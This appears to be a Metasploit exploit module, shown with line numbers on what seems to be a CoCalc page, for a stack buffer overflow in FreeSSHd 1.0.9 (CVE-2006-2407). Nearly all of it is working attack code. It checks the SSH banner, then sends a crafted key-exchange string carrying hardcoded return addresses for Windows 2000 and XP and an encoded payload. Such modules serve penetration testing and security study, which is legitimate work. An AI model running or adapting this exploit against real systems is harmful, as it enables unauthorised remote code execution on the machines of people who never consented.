CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.
16
        This flaw is due to a buffer overflow error when handling a specially
17
        crafted key exchange algorithm string received from an SSH client.
18
      },
19
      'Author'         => 'MC',
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          ['CVE', '2006-2407'],
24
          ['OSVDB', '25463'],
25
          ['BID', '17958'],
26
        ],
27
      'DefaultOptions' =>
28
        {
29
          'EXITFUNC' => 'process',
30
        },
31
      'Payload'        =>
32
        {
33
          'Space'    => 500,
34
          'BadChars' => "\x00",
35
          'StackAdjustment' => -3500,
36
        },
37
      'Platform'       => 'win',
38
      'Targets'        =>
39
        [
40
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ],
41
          [ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e51877 } ],
42
          [ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77e53877 } ],
43
        ],
44
      'Privileged'     => true,
45
      'DisclosureDate' => '2006-05-12',
46
      'DefaultTarget' => 0))
47

48
    register_options(
49
      [
50
        Opt::RPORT(22)
51
      ])
52
  end
53

54
  def exploit
55
    connect
56

57
    sploit =  "SSH-2.0-OpenSSH_3.9p1"
58
    sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
59
    sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
60
    sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
61
    sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
62

63
    res = sock.recv(22)
64
    if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
65
      print_status("Trying target #{target.name}...")
66
      sock.put(sploit)
67
    else
68
      print_status("Not running a vulnerable version...")
69
    end
70

71
    handler
72
    disconnect
73

74
  end
75
end
76

77